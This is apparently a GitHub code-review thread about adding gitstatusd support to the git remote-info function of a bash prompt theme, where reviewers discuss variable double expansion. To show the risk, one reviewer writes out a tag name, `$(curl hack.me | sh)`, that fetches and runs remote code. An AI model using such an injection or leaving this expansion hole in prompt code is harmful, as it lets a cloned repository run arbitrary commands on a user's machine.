themes/githelpers.theme.bash

```diff
@@ -101,29 +117,51 @@ function _git-status-counts {
 }
 
 function _git-remote-info {
-  [[ "$(_git-upstream)" == "" ]] && return || true
-
-  [[ "$(_git-branch)" == "$(_git-upstream-branch)" ]] && local same_branch_name=true || true
-  local same_branch_name=
-  [[ "$(_git-branch)" == "$(_git-upstream-branch)" ]] && same_branch_name=true
-  if ([[ "${SCM_GIT_SHOW_REMOTE_INFO}" = "auto" ]] && [[ "$(_git-num-remotes)" -ge 2 ]]) ||
-      [[ "${SCM_GIT_SHOW_REMOTE_INFO}" = "true" ]]; then
-    if [[ "${same_branch_name}" != "true" ]]; then
-      remote_info="\$(_git-upstream)"
-    else
-      remote_info="$(_git-upstream-remote)"
+
+  if [[ "${SCM_GIT_GITSTATUSD_RAN}" == "true" ]]; then # prompt handling only, reimplement because patching the routine below gets ugly
+    [[ "${VCS_STATUS_REMOTE_NAME}" == "" ]] && return || true
+    [[ "${VCS_STATUS_LOCAL_BRANCH}" == "${VCS_STATUS_REMOTE_BRANCH}" ]] && local same_branch_name=true || true
+    local same_branch_name=
+    [[ "${VCS_STATUS_LOCAL_BRANCH}" == "${VCS_STATUS_REMOTE_BRANCH}" ]] && same_branch_name=true
+    if [[ "${SCM_GIT_SHOW_REMOTE_INFO}" = "true" ]] || [[ "${SCM_GIT_SHOW_REMOTE_INFO}" = "auto" ]]; then # no multiple remote support in gitstatusd
+      if [[ "${same_branch_name}" != "true" ]]; then
+        remote_info="\${VCS_STATUS_REMOTE_NAME}"
```

Comment:
Why `\` here but not below?

Reply:
shameless copy/paste from original function which is now in the 'else' branch.
I have no idea why it has been done this way, I only know that it works as intended.
Only difference is that the variable will be expanded later, I think it has something to do in the way the original functions return their values.

As said earlier...this whole remote info part is very ugly and I pretty much worked around it.

Reply:
> I have no idea why it has been done this way, I only know that it works as intended.

The fact that both `$` and `\$` work means these strings get expanded, which in turn means that using plain `$` can lead to one-too-many expansions.

For example, try creating a remote called `$(pwd)` and then configuring your prompt so that `else` branch executes. That is, this line:

```bash
remote_info="${VCS_STATUS_REMOTE_NAME}/${VCS_STATUS_REMOTE_BRANCH}"
```

You should see `$(pwd)` in your prompt but you might see current directory instead.

Reply:
true, but funnily enough it works exactly this way, because the calling themes expand again if necessary. If you feel like it you can trace down all those expansions but I gave up especially in this function, it's too much 'spaghetti'.

I would just leave it until someone refactors this part.

Reply:
> true, but funnily enough it works exactly this way

Could you clarify? Did you get `$(pwd)` or your current directory in your prompt?

Reply:
Ah that's what you mean. No I didn't try to create a remote named this way. (and anyone who does probably deserves what happens to him ;) )

Currently testing on my work laptop if it works in genereal, maybe I come around to try this as well. But if it's broken in my implementation it was broken all along.

Reply:
> But if it's broken in my implementation it was broken all along.

Pretty sure one of the branches is broken. Either these strings get expanded, in which case `\$` should be used to avoid unnecessary expansions, or they don't get expanded, in which case `$` must be used so that prompt gets the value of `VCS_STATUS_REMOTE_NAME` variable rather than its name.

Note that bugs of this kind can have security implications. For example, suppose your prompt expands `VCS_STATUS_TAG`. If I tag the tip of `master` on my repo with `$(curl hack.me | sh)`, your machine can get pwned just by cloning my repo when your prompt attempts to display the tag name and expands it. It will be invisible to you -- prompt will just show no tag.

I'm no correctness police, so I won't keep harping on it. As long as I've gotten my point across, I'm content.

Reply:
I'm not feeling confident to debug this properly, this should probably be done by the inventor of the code. But I totally see your point.

When talking about expansions: On my CentOS7 work environment I'm having issues inside gitstatusd plugin in the start routine. Currently trying to debug why I get bad substitution on that system

Reply:
> When talking about expansions: On my CentOS7 work environment I'm having issues inside gitstatusd plugin in the start routine. Currently trying to debug why I get bad substitution on that system

Perhaps old bash? I'm using `${foo@Q}`, which is relatively new. Try this on your system:

```bash
echo ${foo@Q}
```

Reply:
I see that you've come to the same conclusion and filed a feature request to support older bash in gitstatus. For the reference: https://github.com/romkatv/gitstatus/issues/65.

If I understand correctly, this shouldn't block your current PR because gitstatusd support is opt-in. Users stuck with ancient bash will not be able to enjoy fast prompt but they won't be any worse than before.

Reply:
Already raised an issue. this is the problem.

As far as our expansion topic goes: I now made it conistent and used \$ in both cases in my new code which works ok. The variables do get expanded later so that's fine.

I did not touch the legacy part though, the git commands used in these are a bit arcane to me, so I leave that to the maintainer.

Reply:
> As far as our expansion topic goes: I now made it conistent and used $ in both cases in my new code which works ok. The variables do get expanded later so that's fine.

:+1: 

> I did not touch the legacy part though, the git commands used in these are a bit arcane to me, so I leave that to the maintainer.

Makes sense.

Reply:
@romkatv @markusdd please take a look at #1622 and see that it is still correct, I made a small change in this logic